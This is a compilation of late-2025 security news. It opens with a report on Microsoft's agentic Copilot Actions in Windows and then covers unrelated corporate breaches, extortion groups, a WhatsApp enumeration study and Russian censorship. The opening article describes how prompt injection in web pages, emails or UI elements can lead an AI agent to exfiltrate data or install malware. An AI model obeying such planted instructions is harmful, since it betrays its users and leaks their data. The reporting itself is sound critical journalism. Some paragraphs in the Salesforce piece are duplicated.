Microsoft’s warning on Tuesday that an experimental AI agent integrated into Windows can infect devices and pilfer sensitive user data has set off a familiar response from security-minded critics: Why is Big Tech so intent on pushing new features before their dangerous behaviors can be fully understood and contained?

As reported Tuesday, Microsoft introduced Copilot Actions, a new set of “experimental agentic features” that, when enabled, perform “everyday tasks like organizing files, scheduling meetings, or sending emails,” and provide “an active digital collaborator that can carry out complex tasks for you to enhance efficiency and productivity.”

Hallucinations and prompt injections apply
The fanfare, however, came with a significant caveat. Microsoft recommended users enable Copilot Actions only “if you understand the security implications outlined.”

The admonition is based on known defects inherent in most large language models, including Copilot, as researchers have repeatedly demonstrated.

One common defect of LLMs causes them to provide factually erroneous and illogical answers, sometimes even to the most basic questions. This propensity for hallucinations, as the behavior has come to be called, means users can’t trust the output of Copilot, Gemini, Claude, or any other AI assistant and instead must independently confirm it.

Another common LLM landmine is the prompt injection, a class of bug that allows hackers to plant malicious instructions in websites, resumes, and emails. LLMs are programmed to follow directions so eagerly that they are unable to discern those in valid user prompts from those contained in untrusted, third-party content created by attackers. As a result, the LLMs give the attackers the same deference as users.

Both flaws can be exploited in attacks that exfiltrate sensitive data, run malicious code, and steal cryptocurrency. So far, these vulnerabilities have proved impossible for developers to prevent and, in many cases, can only be fixed using bug-specific workarounds developed once a vulnerability has been discovered.

That, in turn, led to this whopper of a disclosure in Microsoft’s post from Tuesday:

“As these capabilities are introduced, AI models still face functional limitations in terms of how they behave and occasionally may hallucinate and produce unexpected outputs,” Microsoft said. “Additionally, agentic AI applications introduce novel security risks, such as cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation.”

Microsoft indicated that only experienced users should enable Copilot Actions, which is currently available only in beta versions of Windows. The company, however, didn’t describe what type of training or experience such users should have or what actions they should take to prevent their devices from being compromised. I asked Microsoft to provide these details, and the company declined.

Like “macros on Marvel superhero crack”
Some security experts questioned the value of the warnings in Tuesday’s post, comparing them to warnings Microsoft has provided for decades about the danger of using macros in Office apps. Despite the long-standing advice, macros have remained among the lowest-hanging fruit for hackers out to surreptitiously install malware on Windows machines. One reason for this is that Microsoft has made macros so central to productivity that many users can’t do without them.

“Microsoft saying ‘don’t enable macros, they’re dangerous’… has never worked well,” independent researcher Kevin Beaumont said. “This is macros on Marvel superhero crack.”

Beaumont, who is regularly hired to respond to major Windows network compromises inside enterprises, also questioned whether Microsoft will provide a means for admins to adequately restrict Copilot Actions on end-user machines or to identify machines in a network that have the feature turned on.

A Microsoft spokesperson said IT admins will be able to enable or disable an agent workspace at both account and device levels, using Intune or other MDM (Mobile Device Management) apps.

Critics voiced other concerns, including the difficulty for even experienced users to detect exploitation attacks targeting the AI agents they’re using.

“I don’t see how users are going to prevent anything of the sort they are referring to, beyond not surfing the web I guess,” researcher Guillaume Rossolini said.

Microsoft has stressed that Copilot Actions is an experimental feature that’s turned off by default. That design was likely chosen to limit its access to users with the experience required to understand its risks. Critics, however, noted that previous experimental features—Copilot, for instance—regularly become default capabilities for all users over time. Once that’s done, users who don’t trust the feature are often required to invest time developing unsupported ways to remove the features.

Sound but lofty goals
Most of Tuesday’s post focused on Microsoft’s overall strategy for securing agentic features in Windows. Goals for such features include:

Non-repudiation, meaning all actions and behaviors must be “observable and distinguishable from those taken by a user”
Agents must preserve confidentiality when they collect, aggregate, or otherwise utilize user data
Agents must receive user approval when accessing user data or taking actions
The goals are sound, but ultimately they depend on users reading the dialog windows that warn of the risks and require careful approval before proceeding. That, in turn, diminishes the value of the protection for many users.

“The usual caveat applies to such mechanisms that rely on users clicking through a permission prompt,” Earlence Fernandes, a University of California, San Diego professor specializing in AI security, told Ars. “Sometimes those users don’t fully understand what is going on, or they might just get habituated and click ‘yes’ all the time. At which point, the security boundary is not really a boundary.”

As demonstrated by the rash of “ClickFix” attacks, many users can be tricked into following extremely dangerous instructions. While more experienced users (including a fair number of Ars commenters) blame the victims falling for such scams, these incidents are inevitable for a host of reasons. In some cases, even careful users are fatigued or under emotional distress and slip up as a result. Other users simply lack the knowledge to make informed decisions.

Microsoft’s warning, one critic said, amounts to little more than a CYA (short for cover your ass), a legal maneuver that attempts to shield a party from liability.

“Microsoft (like the rest of the industry) has no idea how to stop prompt injection or hallucinations, which makes it fundamentally unfit for almost anything serious,” critic Reed Mideke said. “The solution? Shift liability to the user. Just like every LLM chatbot has a ‘oh by the way, if you use this for anything important be sure to verify the answers” disclaimer, never mind that you wouldn’t need the chatbot in the first place if you knew the answer.”

As Mideke indicated, most of the criticisms extend to AI offerings other companies—including Apple, Google, and Meta—are integrating into their products. Frequently, these integrations begin as optional features and eventually become default capabilities whether users want them or not.

bleepingcomputer.com
By Bill Toulas
November 20, 2025

Data from Italy's national railway operator, the FS Italiane Group, has been exposed after a threat actor breached the organization's IT services provider, Almaviva.

The hacker claims to have stolen 2.3 terabytes of data and leaked it on a dark web forum. According to the threat actor's description, the leak includes confidential documents and sensitive company information.

Almaviva is a large Italian company that operates globally, providing services such as software design and development, system integration, IT consulting, and customer relationship management (CRM) products.

Andrea Draghetti, Head of Cyber Threat Intelligence at D3Lab, says the leaked data is recent, and includes documents from the third quarter of 2025. The expert ruled out the possibility that the files were recycled from a Hive ransomware attack in 2022.

"The threat actor claims the material includes internal shares, multi-company repositories, technical documentation, contracts with public entities, HR archives, accounting data, and even complete datasets from several FS Group companies," Draghetti says.

"The structure of the dump, organized into compressed archives by department/company, is fully consistent with the modus operandi of ransomware groups and data brokers active in 2024–2025," the cybersecurity expert added.

Almaviva is a major IT services provider with over 41,000 employees across almost 80 branches in Italy and abroad, and an annual turnover of $1.4 billion last year.

FS Italiane Group (FS) is a 100% state-owned railway operator and one of the largest industrial companies in the country, with more than $18 billion in annual revenue. It manages railway infrastructure, passenger and freight rail transport, and also bus services and logistics chains.

While BleepingComputer’s press requests to both Almaviva and FS went unanswered, the IT firm eventually confirmed the breach via a statement to local media.

“In recent weeks, the services dedicated to security monitoring identified and subsequently isolated a cyberattack that affected our corporate systems, resulting in the theft of some data,” Almaviva said.

“Almaviva immediately activated security and counter-response procedures through its specialized team for this type of incident, ensuring the protection and full operability of critical services.”

The company also stated that it has informed authorities in the country, including the police, the national cybersecurity agency, and the country’s data protection authority. An investigation into the incident is ongoing with help and guidance from government agencies.

Almaviva promised to transparently provide updates as more information emerges from the investigation.

Currently, it is unclear if passenger information is present in the data leak or if the data breach is impacting other clients beyond FS.

BleepingComputer has contacted Almaviva with additional questions, but we have not received a response by publication time.

bleepingcomputer.com
By Sergiu Gatlan
November 21, 2025

American cybersecurity firm CrowdStrike has confirmed that an insider shared screenshots taken on internal systems with hackers after they were leaked on Telegram by the Scattered Lapsus$ Hunters threat actors.

However, the company noted that its systems were not breached as a result of this incident and that customers' data was not compromised.

"We identified and terminated a suspicious insider last month following an internal investigation that determined he shared pictures of his computer screen externally," a CrowdStrike spokesperson told BleepingComputer today.

"Our systems were never compromised and customers remained protected throughout. We have turned the case over to relevant law enforcement agencies."

CrowdStrike did not specify the threat group responsible for the incident or the motivations of the malicious insider who shared screenshots.

However, this statement was provided in response to questions from BleepingComputer regarding screenshots of CrowdStrike systems that were recently posted on Telegram by members of the threat groups ShinyHunters, Scattered Spider, and Lapsus$.

ShinyHunters told BleepingComputer earlier today that they allegedly agreed to pay the insider $25,000 to provide them with access to CrowdStrike's network.

The threat actors claimed they ultimately received SSO authentication cookies from the insider, but by then, the suspected insider had already been detected by CrowdStrike, which had shut down his network access.

The extortion group added that they also attempted to purchase CrowdStrike reports on ShinyHunters and Scattered Spider, but did not receive them.

BleepingComputer contacted CrowdStrike again to confirm if this information is accurate and will update the story if we receive additional information.

The Scattered Lapsus$ Hunters cybercrime collective
These groups, now collectively calling themselves "Scattered Lapsus$ Hunters," have previously launched a data-leak site to extort dozens of companies impacted by a massive wave of Salesforce breaches.

Scattered Lapsus$ Hunters have been targeting Salesforce customers in voice phishing attacks since the start of the year, breaching companies such as Google, Cisco, Allianz Life, Farmers Insurance, Qantas, Adidas, ​​​​​​Workday, as well as LVMH subsidiaries, including Dior, Louis Vuitton, and Tiffany & Co.

Companies they attempted to extort include high-profile brands and organizations, such as Google, Cisco, Toyota, Instacart, Cartier, Adidas, Sake Fifth Avenue, Air France & KLM, FedEx, Disney/Hulu, Home Depot, Marriott, Gap, McDonald's, Walgreens, Transunion, HBO MAX, UPS, Chanel, and IKEA.

Scattered Lapsus$ Hunters also claimed responsibility for the Jaguar Land Rover (JLR) breach, stealing sensitive data and significantly disrupting operations, resulting in damages of over £196 million ($220 million) in the last quarter.

As BleepingComputer reported this week, the ShinyHunters and Scattered Spider extortion groups are switching to a new ransomware-as-a-service platform named ShinySp1d3r, after previously using other ransomware gangs' encryptors in attacks, including ALPHV/BlackCat, RansomHub, Qilin, and DragonForce.

This Thursday, ShinyHunters also claimed a new wave of data theft attacks that allegedly impacted Salesforce instances belonging to over 280 companies. In Telegram messages today, they said the list of breached companies contains multiple high-profile names, including LinkedIn, GitLab, Atlassian, Thomson Reuters, Verizon, F5, SonicWall, DocuSign, and Malwarebytes.

As the threat actors told BleepingComputer yesterday, they compromised the Salesforce instances after breaching Gainsight using secrets stolen in the Salesloft drift breach.

therecord.media
Alexander Martin
November 21st, 2025

Two U.K. teenagers pleaded not guilty to hacking the Transport for London agency in 2024 — an attack attributed to the Scattered Spider cybercrime group.

Two British teenagers charged with Computer Misuse Act offenses over a cyberattack on Transport for London (TfL) last year pleaded not guilty during a court appearance on Friday.

Thalha Jubair, 19, and Owen Flowers, 18, were arrested at their homes in East London and Walsall, respectively, by officers from the National Crime Agency (NCA) in September. They appeared at London's Southwark Crown Court on Friday to enter their pleas.

Flowers had initially been arrested over the transit agency attack in September 2024, but released on bail. Both men were remanded into custody following the most recent arrest.

The NCA said following Flowers’ arrest in 2024 that its officers discovered additional potential evidence that the suspect had been involved in attacks against U.S. healthcare companies.

Alongside the TfL incident, Flowers faces two additional charges of conspiring with others to infiltrate and damage the networks of SSM Health Care Corporation and attempting to do the same to Sutter Health in the United States. He pleaded not guilty to these charges too.

Jubair faces an additional charge for refusing to provide investigators with passcodes to access devices seized from him. The Crown Prosecution Service (CPS) did not immediately respond to explain the current status of this charge.

The U.S. Department of Justice also unsealed a complaint against Jubair in September, accusing him of computer crimes.

The specific charges against both men are among the most severe in English law for cyber offenses, specifically “conspiracy to commit an unauthorised act in relation to a computer causing / creating risk of serious damage to human welfare/national security,” the maximum sentence for which is life imprisonment.

At the time of their arrest, Paul Foster, the head of the NCA’s National Cyber Crime Unit, said: “Today’s charges are a key step in what has been a lengthy and complex investigation. This attack caused significant disruption and millions in losses to TfL, part of the UK’s critical national infrastructure.”

It follows the NCA warning of an increasing threat from English-speaking cybercriminal groups, including the loose collective tracked as Scattered Spider, which has been associated with a range of attacks in both Britain and the United States.

“The NCA, UK policing and our international partners, including the FBI, are collectively committed to identifying offenders within these networks and ensuring they face justice,” said Foster.

Hannah Von Dadelszen, the CPS’ chief prosecutor for the Crown Prosecution Service, said: “Our prosecutors have worked to establish that there is sufficient evidence to bring the case to trial and that it is in the public interest to pursue criminal proceedings.”

The charges come as the NCA’s cybercrime unit is understood to be busier than ever in investigating a range of cases. These include the hack against TfL, the Legal Aid Agency, two incidents impacting the National Health Service, and attacks on three retailers — Marks & Spencer, the Co-op, and the London-based luxury store Harrods.

Contempt of court laws prohibit prejudicing a jury trial by suggesting suspects' guilt or innocence, publishing details regarding their past convictions, or speculating about the character of the defendants.

theregister.com
Jessica Lyons
Thu 20 Nov 202

They keep coming back for more

Salesforce has disclosed another third-party breach in which criminals - likely ShinyHunters (again) - may have accessed hundreds of its customers' data.

This time, the suspicious activity involves Gainsight-published applications connected to Salesforce, which are installed and managed directly by customers.

“This activity is likely related to UNC6240 (aka ShinyHunters),” Google Threat Intelligence Group’s principal analyst Austin Larsen told The Register, adding that the threat hunters are “aware of more than 200 potentially affected Salesforce instances.”

"Our investigation indicates this activity may have enabled unauthorized access to certain customers' Salesforce data through the app's connection," the CRM giant said in a security advisory published late Wednesday.

Salesforce has disclosed another third-party breach in which criminals - likely ShinyHunters (again) - may have accessed hundreds of its customers' data.

This time, the suspicious activity involves Gainsight-published applications connected to Salesforce, which are installed and managed directly by customers.

“This activity is likely related to UNC6240 (aka ShinyHunters),” Google Threat Intelligence Group’s principal analyst Austin Larsen told The Register, adding that the threat hunters are “aware of more than 200 potentially affected Salesforce instances.”

"Our investigation indicates this activity may have enabled unauthorized access to certain customers' Salesforce data through the app's connection," the CRM giant said in a security advisory published late Wednesday.

"Per our update, upon detecting the activity, Salesforce revoked all active access and refresh tokens associated with Gainsight-published applications connected to Salesforce and temporarily removed those applications from the AppExchange while our investigation continues," Salesforce spokesperson Allen Tsai told The Register.

Tsai declined to answer specific questions about the breach, including how many customers were compromised - the company has notified those affected, he said - and who is behind the latest theft of Salesforce customers' data.

"There is no indication that this issue resulted from any vulnerability in the Salesforce platform," Tsai said. "The activity appears to be related to the app's external connection to Salesforce."

Gainsight did not immediately respond to The Register's request for comment.
While Salesforce isn't pointing the finger at a particular threat group, Larsen attributed the activity to ShinyHunters. This is the same criminal crew that breached SalesLoft's Drift application earlier this year and stole a bunch of companies' OAuth tokens, which allowed them access to numerous orgs' Salesforce instances.

"Our team at Google Threat Intelligence Group (GTIG) has observed threat actors, tied to ShinyHunters, compromising third-party OAuth tokens to potentially gain unauthorized access to Salesforce customer instances," Larsen said in a LinkedIn post on Thursday.

Google's Mandiant incident response team is working with Salesforce to notify potentially affected organizations, Larsen added, and urged all companies to "view this as a signal to audit their SaaS environments," including conducting regular reviews of all third-party applications connected to their Salesforce instances.

Companies should also "investigate and revoke tokens for unused or suspicious applications," and, upon detecting any anomalous activity, "rotate the credentials immediately," he wrote.

securityweek.com
By Eduard Kovacs|
November 13, 2025 (7:54 AM ET)

The UK’s national healthcare system is working with the country’s National Cyber Security Centre to investigate the incident.

Cybercriminals have named the United Kingdom’s National Health Service (NHS) as one of the victims of the recent data theft and extortion campaign targeting organizations that use Oracle’s E-Business Suite (EBS) enterprise resource planning solutions.

“We are aware that the NHS has been listed on a cyber-crime website as being impacted by a cyber-attack, but no data has been published,” a spokesperson for NHS England told SecurityWeek. “Our cyber security team is working closely with the National Cyber Security Centre to investigate.”

The Oracle EBS hacking campaign came to light in early October and within two weeks the cybercriminals started naming victims on the Cl0p ransomware group’s leak website. The hackers have since made public data allegedly stolen from organizations such as Harvard University, American Airlines subsidiary Envoy Air, industrial giants Schneider Electric and Emerson, and The Washington Post.

The NHS is the latest organization named on the Cl0p ransomware leak website, which now lists more than 40 alleged victims of the Oracle EBS campaign. Data allegedly obtained from 25 targets has been published.

One of the victims named in recent days is Hitachi subsidiary GlobalLogic, a provider of digital engineering solutions.

GlobalLogic confirmed this week that the cybercriminals gained access to HR information for current and former employees, including names, addresses, contact information, dates of birth, passport information, Social Security numbers, salary information, and bank account details. The company said the incident impacts more than 10,000 individuals.

A majority of the organizations named on the Cl0p website have yet to confirm or deny being impacted. The list includes major companies such as Logitech, Cox Enterprises, Pan American Silver, LKQ Corporation, and Copeland.

Victims of the Oracle EBS hack are likely conducting investigations and some of them likely do not want to share information until their probes are completed. Others are likely trying to avoid the spotlight by staying silent.

While Cl0p’s history suggests that organizations are rarely listed as victims without cause, the actual scope of the breach may be exaggerated by the threat actors to pressure victims into payment.

| TechCrunch
Zack Whittaker
5:09 AM PST · November 17, 2025

The defacement of Protei's website said "another DPI/SORM provider bites the dust," apparently referring to the company selling its web intercept and surveillance products to phone and internet providers.
A Russian telecom company that develops technology to allow phone and internet companies to conduct web surveillance and censorship was hacked, had its website defaced, and had data stolen from its servers, TechCrunch has learned.

Founded in Russia, Protei makes telecommunications systems for phone and internet providers across dozens of countries, including Bahrain, Italy, Kazakhstan, Mexico, Pakistan and much of central Africa. The company, now headquartered in Jordan, sells video conferencing technology and internet connectivity solutions, as well as surveillance equipment and web-filtering products, such as deep packet inspection systems.

It’s not clear exactly when or how Protei was hacked, but a copy of the company’s website saved on the Internet Archive’s Wayback Machine shows it was defaced on November 8. The website was restored soon after.

During the breach, the hacker obtained the contents of Protei’s web server — around 182 gigabytes of files — including emails dating back years.

A copy of Protei’s data was provided to DDoSecrets, a nonprofit transparency collective that indexes leaked datasets in the public interest, including data from law enforcement, government agencies, and companies involved in the surveillance industry.
Mohammad Jalal, the managing director of Protei’s branch in Jordan, did not respond to a request for comment about the breach.

The identity of the hacker is not known, nor their motivations, but the defaced website read: “another DPI/SORM provider bites the dust.” The message likely references the company’s sales of deep packet inspection systems and other internet filtering technology for the Russian-developed lawful intercept system known as SORM.

SORM is the main lawful intercept system used across Russia as well as several other countries that use Russian technology. Phone and internet providers install SORM equipment on their networks, which allows their country’s governments to obtain the contents of calls, text messages, and web browsing data of the networks’ customers.

Deep-packet inspection devices allow telecom companies to identify and filter web traffic depending on its source, such as a social media website or a specific messaging app, and selectively block access. These systems are used for surveillance and censorship in regions where freedom of speech and expression are limited.

The Citizen Lab reported in 2023 that Iranian telecoms giant Ariantel had consulted with Protei about technology for logging internet traffic and blocking access to certain websites. Documents seen and published by The Citizen Lab show that Protei touted its technology’s ability to restrict or block access to websites for specific people or entire swathes of the population.

Reuters reuters.com
Reporting by Charlie Devereux and Aislinn Laing, additional reporting by Emma Pinedo, editing by Andrei Khalip, David Latona and Alexander Smith

• Spain's parliament to investigate Meta for privacy violations
• Research suggests Meta tracked Android users' web activity
• Meta faces scrutiny under EU laws including GDPR and DSA

MADRID, Nov 19 (Reuters) - Spain's parliament will investigate Meta (META.O), opens new tab for possible privacy violations of its Facebook and Instagram users, Spanish Prime Minister Pedro Sanchez said on Wednesday.
"In Spain, the law is above any algorithm or any large technology platform. And anyone who violates our rights will pay the consequences," Sanchez said in a statement.

The investigation stems from international research that found Meta had used a hidden mechanism to track the web activity of Android device users, Sanchez's office said.

Meta did not immediately reply to a request for comment.
Spain's investigation into the U.S. tech giant threatens to further sour relations with Washington, which has rounded on Madrid over its failure to meet NATO spending targets and for its friendliness with Beijing.
President Donald Trump's administration has also criticised the EU's Digital Markets Act, which seeks to curb the power of Big Tech, and the Digital Services Act, which requires large online platforms to tackle illegal and harmful content.
Spain's government said Meta may have violated various European Union laws on security and privacy including its General Data Protection Regulation (GDPR), the ePrivacy Directive, the DMA and the DSA.

Meta, which is led by U.S. billionaire Mark Zuckerberg, will be called to testify before a lower house committee, it added.
The company has had several legal clashes with the European Commission, which in preliminary findings in October said Meta and TikTok had breached their legal obligation to grant researchers adequate access to public data.
The Commission fined Meta 798 million euros ($923 million) in 2024 for abusive practices benefiting Facebook Marketplace while in July last year it charged the company for failing to comply with the DMA in its new pay or consent advertising model.

univie.ac.at
University of Vienna
18.11.2025

IT-Security Researchers from the University of Vienna and SBA Research identified and responsibly disclosed a large-scale privacy weakness in WhatsApp's contact discovery mechanism that allowed the enumeration of 3.5 billion accounts. In collaboration with the researchers, Meta has since addressed and mitigated the issue. The study underscores the importance of continuous, independent security research on widely used communication platforms and highlights the risks associated with the centralization of instant messaging services. The preprint of the study has now been published, and the results will be presented in 2026 at the Network and Distributed System Security (NDSS) Symposium.

WhatsApp's contact discovery mechanism can use a user's address book to find other WhatsApp users by their phone number. Using the same underlying mechanism, the researchers demonstrated that it was possible to query more than 100 million phone numbers per hour through WhatsApp's infrastructure, confirming more than 3.5 billion active accounts across 245 countries. "Normally, a system shouldn't respond to such a high number of requests in such a short time — particularly when originating from a single source," explains lead author Gabriel Gegenhuber from the University of Vienna. "This behavior exposed the underlying flaw, which allowed us to issue an effectively unlimited requests to the server and, in doing so, map user data worldwide."

The accessible data items used in the study are the same that are public for anyone who knows a user's phone number and consist of: phone number, public keys, timestamps, and, if set to public, about text and profile picture. From these data points, the researchers were able to extract additional information, which allowed them to infer a user's operating system, account age, as well as the number of linked companion devices. The study shows that even this limited amount of data per user can reveal important information, both on macroscopic and individual levels.

The study also revealed a range of broader insights:
Millions of active WhatsApp accounts were identified in countries where the platform was officially banned, including China, Iran, and Myanmar.
Population-level insights into platform usage, such as the global distribution of Android (81%) versus iOS (19%) devices, regional differences in privacy behavior (e.g., use of public profile pictures or "about" tagline), and variations in user growth across countries.
A small number of cases showed re-use of cryptographic keys across different devices or phone numbers, pointing to potential weaknesses in non-official WhatsApp clients or fraudulent use.
Nearly half of all phone numbers that appeared in the 2021 Facebook data leak of 500 million phone numbers (caused by a scraping incident in 2018) were still active on WhatsApp. This highlights the enduring risks for leaked numbers (e.g., being targeted in scam calls) associated with such exposures.
The study did not involve access to message content, and no personal data was published or shared. All retrieved data was deleted by the researchers prior to publication. Message content on WhatsApp is “end-to-end encrypted” and was not affected at any time. “This end-to-end encryption protects the content of messages, but not necessarily the associated metadata,” explains last author Aljosha Judmayer from the University of Vienna. “Our work shows that privacy risks can also arise when such metadata is collected and analysed on a large scale.”

“These findings remind us that even mature, widely trusted systems can contain design or implementation flaws that have real-world consequences," says lead author Gabriel Gegenhuber from the University of Vienna: "They show that security and privacy are not one-time achievements, but must be continuously re-evaluated as technology evolves."

"Building on our previous findings on delivery receipts and key management, we are contributing to a long-term understanding of how messaging systems evolve and where new risks arise," adds co-author Maximilian Günther from the University of Vienna.

“We are grateful to the University of Vienna researchers for their responsible partnership and diligence under our Bug Bounty program. This collaboration successfully identified a novel enumeration technique that surpassed our intended limits, allowing the researchers to scrape basic publicly available information. We had already been working on industry-leading anti-scraping systems, and this study was instrumental in stress-testing and confirming the immediate efficacy of these new defenses. Importantly, the researchers have securely deleted the data collected as part of the study, and we have found no evidence of malicious actors abusing this vector. As a reminder, user messages remained private and secure thanks to WhatsApp’s default end-to-end encryption, and no non-public data was accessible to the researchers”, says Nitin Gupta, Vice President of Engineering at WhatsApp.

Ethical Handling and Disclosure
The research was conducted with strict ethical guidelines and in accordance with responsible disclosure principles. The findings were promptly reported to Meta, the operator of WhatsApp, which has since implemented countermeasures (e.g., rate-limiting, stricter profile information visibility) to close the identified vulnerability. The authors argue that transparency, academic scrutiny, and independent testing are essential to maintaining trust in global communication services. They emphasize that proactive collaboration between researchers and industry can significantly improve user privacy and prevent abuse.

Research Context
This publication represents the third study by researchers from the University of Vienna and SBA Research examining the security and privacy of prevalent instant messengers such as WhatsApp and Signal. The team investigates how design and implementation choices in end-to-end encrypted messaging services can unintentionally expose user information or weaken privacy guarantees.

Earlier this year, the researchers published "Careless Whisper: Exploiting Silent Delivery Receipts to Monitor Users on Mobile Instant Messengers" (distinguished with the Best Paper Award at RAID 2025), which demonstrated how silent pings and their delivery receipts could be abused to infer user activity patterns and online behavior on WhatsApp and similar messaging platforms. Later that same year, "Prekey Pogo: Investigating Security and Privacy Issues in WhatsApp's Handshake Mechanism" (presented at USENIX WOOT 2025) analyzed the cryptographic foundations of WhatsApp's prekey distribution mechanism, revealing implementation weaknesses of the Signal-based protocol.

"By building on our earlier findings about delivery receipts and key management, we're contributing to a long-term understanding of how messaging systems evolve, and where new risks emerge." said Maximilian Günther (University of Vienna).

The current study, "Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy", extends this line of research to the global scope, showing how contact discovery mechanisms can unintentionally allow large-scale user enumeration at an unprecedented magnitude. It will appear in the proceedings of the NDSS Symposium 2026, one of the leading international conferences on computer and network security.

Publication: Gabriel K. Gegenhuber, Philipp É. Frenzel, Maximilian Günther, Johanna Ullrich und Aljosha Judmayer: Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy. In: Network and Distributed System Security Symposium (NDSS), 2026.

| The European Correspondent
Dmitriy Beliaev

A Russian series released in October used AI to replace actor Maxim Vitorgan’s face – and removed his name from the credits. Vitorgan reported it himself on social media, while the streaming platform Kion offered no explanation.

It was the second time the actor had been digitally erased and replaced with AI – a punishment for his vocal opposition to the war in Ukraine. On the first day of the invasion in 2022, he posted a black square on Instagram with the caption “Shame” to his 700,000 followers. That led to his removal from another show in 2023.

Erasing “undesirable” actors, writers, and musicians has become routine in Russia, where censorship has tightened its grip on cultural life since the country’s full-scale invasion of Ukraine.

TV channels and streaming platforms now not only blur or replace actors with AI, but also cut entire scenes – scrubbing away unwanted dialogue, characters, or references that the state considers unwelcome.

In April 2025, a TV channel removed a map of Odesa and cut a reference to the 2006 deportation of Georgian citizens from Russia in a 2010 film (which also featured Vitorgan). In June, Russian streaming services removed a line mentioning Putin’s death from a 2024 Spanish thriller Rich Flu.

Censorship now extends far beyond politics, reshaping even harmless scenes: in early November, following a law banning so-called “LGBT propaganda”, a Russian online cinema cut a Fight Club (1999) scene showing men kissing.

It goes beyond films. Several broadcasters have been fined for airing music videos deemed “LGBT propaganda”. In January 2023, a court fined the TNT Music channel one million rubles (roughly €10,600) over a music video Hallucination by Regard and Years & Years.

A year later, another broadcaster, Tochka TV, was fined for airing a music video by pro-regime singer Nikolai Baskov for containing “LGBT propaganda” because of “the lyrical subject’s relationship with a male”. The video had aired on television without issue before. After the new laws came in, some Russian artists began deleting their old videos from YouTube and social media.

Publishers are also blacking out entire paragraphs in books. Even a biography of Italian director Pier Paolo Pasolini was censored, with about a fifth of the text removed because it described an openly gay filmmaker's personal life.

The invasion of Ukraine has triggered a kind of patriotic cultural revolution. Actors, directors, and musicians who publicly opposed the war have been effectively blacklisted – removed from the big screens, stripped of work, and, in many cases, pushed into exile. Some have been declared “foreign agents”, a status that severely restricts civil rights and professional opportunities.

Some songs by these “agents” are being removed from Russian streaming platforms, and performing them publicly can lead to fines or even arrest. For the most recent case – in October, several young street musicians in St Petersburg were arrested for singing songs by anti-war artists.